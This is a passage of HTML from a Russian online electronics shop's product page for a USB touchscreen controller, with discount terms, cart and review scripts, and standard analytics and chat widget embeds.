  <span style="color:#696969;"><strong>3.</strong></span> если Вы приобрете от 3 (5/10) штук одного вида товара, то сумма заказа будет пересчитана соответственно на порядок дешевле</p>
<p>
  <span style="color:#696969;"><strong>4.</strong></span> если Вы напишите статью (с фото желательно) по разборке или ремонту того или иного оборудования и мы ее разместим у нас на сайте, то Вам будет предоставленна скидка на товар от 100 до 200 руб (в счет нынешнего / будущего заказа или на мобильный телефон) - <a href="mailto:shop@ellk.ru">сообщив на e-mail</a></p>
<p>
  <span style="color:#696969;"><strong>5.</strong></span> если Вы разместите развернутый положительный отзыв на любом другом форуме / блоге или еще где, то Вам также будет предоставленна скидка на товар от 20 до 50 руб (в счет нынешнего / будущего заказа или на мобильный телефон) - ссылку на отзыв можете указать в комментарии к заказу другим способом сообщив нам</p>
<p>
  &nbsp;</p>
<p>
  <span style="color:#696969;"><strong>Все скидки могут суммироваться - таким образом можно сэкономить от 20 до 1000 руб и больше (в зависимости от заказа / товаров / способов). А на написании статей - Вы сможете даже заработать :-))))</strong></span></p>
                                    
    </div>
  
    
  <div class="tags"><b>Метки:</b>
            <a href="https://ellk.ru/search/?tag=USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм">USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм</a>,
                <a href="https://ellk.ru/search/?tag=usbkon_5mm">usbkon_5mm</a>,
                <a href="https://ellk.ru/search/?tag=Универсальный">Универсальный</a>,
                <a href="https://ellk.ru/search/?tag=Платы питания">Платы питания</a>,
                <a href="https://ellk.ru/search/?tag=управления">управления</a>,
                <a href="https://ellk.ru/search/?tag=инвертеры и прочее">инвертеры и прочее</a>
          </div>
    </div></div>
<script type="text/javascript"><!--
$(document).ready(function() {
	$('.colorbox').colorbox({
		overlayClose: true,
		opacity: 0.5,
		rel: "colorbox"
	});
});
//--></script> 
<script type="text/javascript"><!--
$('#button-cart').bind('click', function() {
	$.ajax({
		url: 'index.php?route=checkout/cart/add',
		type: 'post',
		data: $('.product-info input[type=\'text\'], .product-info input[type=\'hidden\'], .product-info input[type=\'radio\']:checked, .product-info input[type=\'checkbox\']:checked, .product-info select, .product-info textarea'),
		dataType: 'json',
		success: function(json) {
			$('.success, .warning, .attention, information, .error').remove();
			
			if (json['error']) {
				if (json['error']['option']) {
					for (i in json['error']['option']) {
						$('#option-' + i).after('<span class="error">' + json['error']['option'][i] + '</span>');
					}
				}
			} 
			
			if (json['success']) {
				$('#notification').html('<div class="success" style="display: none;">' + json['success'] + '<img src="catalog/view/theme/default/image/close.png" alt="" class="close" /></div>');
					
				$('.success').fadeIn('slow');
					alert(json['total']);
				$('#cart-total').html(json['total']);
				
				$('html, body').animate({ scrollTop: 0 }, 'slow'); 
			}	
		}
	});
});
//--></script>
<script type="text/javascript"><!--
$('#review .pagination a').live('click', function() {
	$('#review').fadeOut('slow');
		
	$('#review').load(this.href);
	
	$('#review').fadeIn('slow');
	
	return false;
});			

$('#review').load('index.php?route=product/product/review&product_id=989');

$('#button-review').bind('click', function() {
	$.ajax({
		url: 'index.php?route=product/product/write&product_id=989',
		type: 'post',
		dataType: 'json',
		data: 'name=' + encodeURIComponent($('input[name=\'name\']').val()) + '&text=' + encodeURIComponent($('textarea[name=\'text\']').val()) + '&rating=' + encodeURIComponent($('input[name=\'rating\']:checked').val() ? $('input[name=\'rating\']:checked').val() : '') + '&captcha=' + encodeURIComponent($('input[name=\'captcha\']').val()),
		beforeSend: function() {
			$('.success, .warning').remove();
			$('#button-review').attr('disabled', true);
			$('#review-title').after('<div class="attention"><img src="catalog/view/theme/default/image/loading.gif" alt="" /> Пожалуйста, подождите!</div>');
		},
		complete: function() {
			$('#button-review').attr('disabled', false);
			$('.attention').remove();
		},
		success: function(data) {
			if (data['error']) {
				$('#review-title').after('<div class="warning">' + data['error'] + '</div>');
			}
			
			if (data['success']) {
				$('#review-title').after('<div class="success">' + data['success'] + '</div>');
								
				$('input[name=\'name\']').val('');
				$('textarea[name=\'text\']').val('');
				$('input[name=\'rating\']:checked').attr('checked', '');
				$('input[name=\'captcha\']').val('');
			}
		}
	});
});
//--></script> 
<script type="text/javascript"><!--
$('#tabs a').tabs();
//--></script> 
<script type="text/javascript" src="catalog/view/javascript/jquery/ui/jquery-ui-timepicker-addon.js"></script> 
<script type="text/javascript"><!--
$(document).ready(function() {
	if ($.browser.msie && $.browser.version == 6) {
		$('.date, .datetime, .time').bgIframe();
	}

	$('.date').datepicker({dateFormat: 'yy-mm-dd'});
	$('.datetime').datetimepicker({
		dateFormat: 'yy-mm-dd',
		timeFormat: 'h:m'
	});
	$('.time').timepicker({timeFormat: 'h:m'});
});
//--></script> 

<script type="text/javascript"><!--
$('#webmeProductQuestionFormCtrl').bind('click', function(){
	$('#webmeProductQuestionForm').slideToggle('slow', function(){
		var qIcon = '<img src="catalog/view/theme/default/image/webme/product_question/product_question_customer_avatar_x64.png" border="0" width="20" alt="" title="" style="margin-right:5px; vertical-align:middle;" />';
		if ($(this).is(":visible")) {
			$('#webmeProductQuestionFormCtrl').html(qIcon+'скрыть форму');
		} else {
			$('#webmeProductQuestionFormCtrl').html(qIcon+'задать вопрос');
		}
	});

	return false;
});

function randomString() {
	var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";
	var string_length = 8;
	var randomstring = '';
	for (var i=0; i<string_length; i++) {
		var rnum = Math.floor(Math.random() * chars.length);
		randomstring += chars.substring(rnum,rnum+1);
	}
	
	return randomstring;
}
$('.reload_captcha').click(function(){
	var ctrl_id = $(this).attr('id');
	var ctrl_id_part = ctrl_id.split('_');
	reload_captcha(ctrl_id_part[1]);
});

function reload_captcha(target) {
	var random_string_new = randomString();
	$.get('index.php?route=product/webme_product_question/webme_product_question_captcha&r='+random_string_new+'', function(data){
		$('#'+target+'_captcha_image_div').html('<img id="'+target+'_captcha" src="index.php?route=product/webme_product_question/webme_product_question_captcha&r='+random_string_new+'" />');
	});
	$('#'+target+'_captcha_input').val(''); /* clear captcha input */
}

$('#buttonWebmeProductQuestion').bind('click', function() {
	
	var author = encodeURIComponent($('input[name=\'question_author\']').val());
	var question = encodeURIComponent($('textarea[name=\'question_text\']').val());
	var captcha = encodeURIComponent($('input[name=\'question_captcha\']').val());
	var receive_answers = ($('#receive_question_answers_to_email').is(':checked')) ? 1 : 0 ;
	var email_for_answers = encodeURIComponent($('input[name=\'email_for_answers\']').val());
	
	var close_image = '<img src="catalog/view/theme/default/image/webme/close.png" alt="" class="close">';
	
	$.ajax({
		url: 'index.php?route=product/webme_product_question/write_product_question&product_id=989',
		type: 'post',
		dataType: 'json',
		data: 'author=' + author + '&question=' + question + '&captcha=' + captcha + '&receive_answers=' + receive_answers + '&email_for_answers=' + email_for_answers,
		beforeSend: function() {
			$('.success, .warning').remove();
			$('#buttonWebmeProductQuestion').attr('disabled', true);
			$('#webmeProductQuestionTitle').after('<div class="attention"><img src="catalog/view/theme/default/image/loading.gif" alt="" /> Пожалуйста, подождите!</div>');
		},
		complete: function() {
			$('#buttonWebmeProductQuestion').attr('disabled', false);
			$('.attention').remove();
		},
		success: function(data) {
			
			if (data['error']) {
				$('#webmeProductQuestionTitle').after('<div class="warning">' + data['error'] + ''+close_image+'</div>');
			}
			
			if (data['success']) {
				$('textarea[name=\'question_text\']').val('');
				$('input[name=\'question_captcha\']').val('');
				$('#reload_wpq_captcha').trigger('click');
				$('input[name=\'email_for_answers\']').val('');
				
				$('#webmeProductQuestionTitle').after('<div class="success">' + data['success'] + ''+close_image+'</div>');
			}
		}
	});
});

$('.success img, .warning img, .attention img, .information img').live('click', function() {
	$(this).parent().fadeOut('slow', function() {
		$(this).remove();
	});
});





//--></script>


<script>
if ('undefined' != typeof VK) {
	VK.Observer.subscribe("widgets.like.liked", function () {
		sd_userAction('vk','like');
	});
	VK.Observer.subscribe("widgets.like.unliked", function () {
		sd_userAction('vk','unlike');
	});
}
if ('undefined' != typeof VK) {
	VK.Observer.subscribe("widgets.like.shared", function () {
		sd_userAction('vk','share');
	});
	VK.Observer.subscribe("widgets.like.unpublished", function () {
		sd_userAction('vk','unpublish');
	});
}

function plusone_share(data) {
	console.log(data.state);
	
	if (data.state == 'on') {
		sd_userAction('gp','like');
	} else {
		sd_userAction('gp','unlike');
	}
}

if ('undefined' != typeof mailru) {
	mailru.loader.require('api', function(){
	   mailru.events.listen(mailru.plugin.events.liked, function(result){
		   /* todo - save ID of liked recored */
		   		   if (result.type == 'mm') {
				sd_userAction('mm','like');
		   }
		   	   });

	   mailru.events.listen(mailru.plugin.events.unliked, function(result){
		   		   if (result.type == 'mm') {
				sd_userAction('mm','unlike');
		   }
		   	   });
	});
}

(function(w){
  function onShare(e) {
    var args = e.data.split("$");
    if (args[0] == "ok_shared") {
      sd_userAction('ok','like');
    }
  }
  
  if (w.addEventListener) {
    w.addEventListener('message', onShare, false);
  } else {
    w.attachEvent('onmessage', onShare);
  }
}(window));

if ('undefined' != typeof twttr) {
	twttr.ready(function (twttr) {
		twttr.events.bind('tweet', function(event) {
			sd_userAction('tw','like');
		});
	});
}




function sd_userAction(soc, action) {
	var product_id = 989;
	$.ajax({
		url: 'https://ellk.ru/index.php?route=module/social_discount/action',
		type: 'POST',
		dataType: 'json',
		data: {
			"product_id": product_id,
			"social": soc,
			"action": action
		},
		success: function(data) {
			if (data['success']) {
				sd_updateOffer(data);
			}
		}
	});
}
</script>
			

<script type="text/javascript">
function sd_updateOffer(data) {
	if (data['percent'] > 0) {
		$('#priceUpdate1').html(data['discount_price']);
		$('#priceUpdate').addClass('price-old');
		
		if (data['social_discount']) {
			$('#social_discount_active').show().css('display', 'inline-block');
		} else {
			$('#social_discount_active').hide();
		}
	} else {
		$('#priceUpdate').removeClass('price-old');
		$('#priceUpdate1').html('');
		$('#social_discount_active').hide();
	}
}
</script>
			
<div id="footer">
    <div class="column">
    <h3>Информация</h3>
    <ul>
            <li><a href="https://ellk.ru/politika-konfidencialnosti.html">Политика конфиденциальности</a></li>
            <li><a href="https://ellk.ru/kak-oformit-zakaz.html">Как оформить заказ</a></li>
            <li><a href="https://ellk.ru/o-nas-kontakty-rekvizity.html">О нас / Контакты / Реквизиты</a></li>
            <li><a href="https://ellk.ru/informaciya-o-dostavke.html">Информация о доставке</a></li>
            <li><a href="https://ellk.ru/informaciya-ob-oplate.html">Информация об оплате</a></li>
            <li><a href="https://ellk.ru/nashi-bannery.html">Наши баннеры</a></li>
            <li><a href="http://ellk.ru/index.php?route=information/articles">Полезные статьи</a></li>
    </ul>
  </div>
    <div class="column">
    <h3>Служба поддержки</h3>
    <ul>
      <li><a href="https://ellk.ru/contact-us/">Связаться с нами</a></li>
      <li><a href="https://ellk.ru/request-return/">Возврат товара</a></li>
      <li><a href="https://ellk.ru/sitemap/">Карта сайта</a></li>
    </ul>
  </div>
  <div class="column">
    <h3>Дополнительно</h3>
    <ul>
      <li><a href="https://ellk.ru/brands/">Производители</a></li>
      
    </ul>
  </div>
  <div class="column">
    <h3>Личный Кабинет</h3>
    <ul>
      <li><a href="https://ellk.ru/my-account/">Личный Кабинет</a></li>
      <li><a href="https://ellk.ru/order-history/">История заказов</a></li>
      <li><a href="https://ellk.ru/wishlist/">Закладки</a></li>

                        
                                                            <li><a href="https://ellk.ru/index.php?route=account/waitlist">Лист ожидания</a></li>
                                                    
                    
      <li><a href="https://ellk.ru/newsletter/">Рассылка</a></li>
    </ul>
  </div>

<script type="text/javascript">(function() {
  if (window.pluso)if (typeof window.pluso.start == "function") return;
  if (window.ifpluso==undefined) { window.ifpluso = 1;
    var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
    s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
    s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://share.pluso.ru/pluso-like.js';
    var h=d[g]('body')[0];
    h.appendChild(s);
  }})();</script>
<div class="pluso" data-background="transparent" data-options="medium,square,line,horizontal,counter,theme=04" data-services="vkontakte,facebook,odnoklassniki"></div>
</script>

<div style='float:right;'>
<!-- Yandex.Metrika informer -->
<a href="https://metrika.yandex.ru/stat/?id=31423423&amp;from=informer"
target="_blank" rel="nofollow"><img src="https://mc.yandex.ru/informer/31423423/3_0_FFFFFFFF_EFEFEFFF_0_pageviews"
style="width:88px; height:31px; border:0;" alt="Яндекс.Метрика" title="Яндекс.Метрика: данные за сегодня (просмотры, визиты и уникальные посетители)" onclick="try{Ya.Metrika.informer({i:this,id:31423423,lang:'ru'});return false}catch(e){}" /></a>
<!-- /Yandex.Metrika informer -->

<!-- Yandex.Metrika counter -->
<script type="text/javascript">
    (function (d, w, c) {
        (w[c] = w[c] || []).push(function() {
            try {
                w.yaCounter31423423 = new Ya.Metrika({
                    id:31423423,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true
                });
            } catch(e) { }
        });

        var n = d.getElementsByTagName("script")[0],
            s = d.createElement("script"),
            f = function () { n.parentNode.insertBefore(s, n); };
        s.type = "text/javascript";
        s.async = true;
        s.src = "https://mc.yandex.ru/metrika/watch.js";

        if (w.opera == "[object Opera]") {
            d.addEventListener("DOMContentLoaded", f, false);
        } else { f(); }
    })(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/31423423" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->

<!--cy-pr.com-->
<a href="https://www.cy-pr.com/" target="_blank"><img src="https://www.cy-pr.com/e/ellk.ru_22.gif" border="0" width="88" height="31" alt="Проверка тиц pr" /></a>
<!--cy-pr.com-->

<!--Openstat-->
<span id="openstat1"></span>
<script type="text/javascript">
var openstat = { counter: 1, image: 87, color: "828282", next: openstat };
(function(d, t, p) {
var j = d.createElement(t); j.async = true; j.type = "text/javascript";
j.src = ("https:" == p ? "https:" : "http:") + "//openstat.net/cnt.js";
var s = d.getElementsByTagName(t)[0]; s.parentNode.insertBefore(j, s);
})(document, "script", document.location.protocol);
</script>
<!--/Openstat-->
</div>
</div>
<!--
OpenCart is open source software and you are free to remove the powered by OpenCart if you want, but its generally accepted practise to make a small donation.
Please donate via PayPal to donate@opencart.com
//-->

<!--
OpenCart is open source software and you are free to remove the powered by OpenCart if you want, but its generally accepted practise to make a small donation.
Please donate via PayPal to donate@opencart.com
//-->
</div>
<!--Start of Zopim Live Chat Script--><script type="text/javascript"> 


window.$zopim||(function(d,s){var z=$zopim=function(c){z._.push(c)},$=z.s= 

d.createElement(s),e=d.getElementsByTagName(s)[0];z.set=function(o){z.set. 

_.push(o)};z._=[];z.set._=[];$.async=!0;$.setAttribute('charset','utf-8'); 

$.src='//cdn.zopim.com/?uP6RayUVIuhZzVQfRfBoOQrFvTQRmMRE';z.t=+new Date;$. 

type='text/javascript';e.parentNode.insertBefore($,e)})(document,'script'); 

</script> 

<!--End of Zopim Live Chat Script--> 

<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>

				  
			
</body>
			</html>